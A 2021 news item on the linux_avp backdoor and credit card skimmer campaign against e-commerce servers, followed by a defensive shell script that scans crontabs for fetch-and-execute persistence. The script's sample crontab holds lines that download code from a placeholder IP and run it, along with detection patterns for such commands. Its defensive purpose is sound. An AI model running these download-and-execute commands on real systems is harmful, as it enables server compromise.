Last Updated on 26/11/2021 by Anamika
Reportedly, cybercriminals are running a new hacking campaign that plants a Linux backdoor on e-commerce web servers and uses it to deploy a credit card skimmer on the sites.
Researchers at Sansec Threat Research found a new malicious agent, named linux_avp, that hides as a system process on e-commerce web servers.
The attackers have been deploying this malware since mid-November, and it reports back to a command-and-control server located in Beijing.
The attackers first probe e-commerce websites for weaknesses; once a weakness is found, they exploit it to gain a foothold on the server and install the Linux backdoor, which gives them persistent access to the compromised store.
“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data,” according to a report from ITPro.
The malware also survives removal or a server reboot: a malicious crontab entry re-downloads the Golang malware into a randomly chosen writable directory and executes it, and the dropper then installs two configuration files.
The malware is affecting a large number of e-commerce websites, but it is still unclear why its control server is hosted in Beijing.
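As an added illustration (not code from Sansec or from the article), here is a small POSIX-shell triage script for the persistence technique just described. It flags crontab entries that fetch and execute something over the network, or that run a binary out of a writable staging directory, and it checks whether a given executable path lives in a world-writable directory. The regular expressions are a constructed heuristic, not a signature for linux_avp itself; the sample crontab lines are constructed, and 203.0.113.10 is a documentation address, not a real control server.

```shell
#!/bin/sh
# Added example for triaging the crontab persistence described in the article.
# Not Sansec's or the article's code; the patterns are an illustrative
# heuristic for fetch-and-execute cron entries, not a linux_avp signature.

# scan_crontab: read crontab lines on stdin and print the ones that
#   (a) pipe curl/wget output straight into a shell,
#   (b) download into /tmp, /dev/shm or /var/tmp, or
#   (c) execute something from one of those writable staging directories.
scan_crontab() {
    grep -Ev '^[[:space:]]*(#|$)' |
    grep -E '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)([[:space:]]|$)|(curl|wget).*(-o|-O|>)[[:space:]]*/(tmp|dev/shm|var/tmp)/|[[:space:]]/(tmp|dev/shm|var/tmp)/[^[:space:]]+'
}

# in_writable_dir PATH: exit 0 when the directory holding PATH is
# world-writable (where a dropper fetched by cron typically lands),
# exit 1 when it is not, exit 2 when the directory does not exist.
in_writable_dir() {
    dir=$(dirname "$1")
    [ -d "$dir" ] || return 2
    # The 9th character of the ls -ld mode string is the "other" write bit.
    case "$(ls -ld "$dir" | cut -c9)" in
        w) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_host: run scan_crontab over the system and per-user crontabs and
# prefix each hit with the file it came from. Needs root to read other
# users' crontabs; call it manually on a host under investigation.
audit_host() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        scan_crontab < "$f" | sed "s|^|$f: |"
    done
}

# Constructed sample crontab for demonstration; the second line is a
# benign entry that must not be flagged.
SAMPLE_CRONTAB='# m h dom mon dow command
*/5 * * * * curl -s http://203.0.113.10/dl | sh
0 3 * * * /usr/bin/apt-get update
* * * * * wget -q -O /tmp/.x http://203.0.113.10/x && chmod +x /tmp/.x && /tmp/.x'

# Demo: prints the two suspicious entries from the sample.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
```

The heuristic is deliberately loose: a hit only means the entry deserves a look, and any legitimate job that stages files in /tmp will also be listed. Pair it with a check of the running processes whose executable sits in a writable directory, since the article notes the agent disguises itself as a system process.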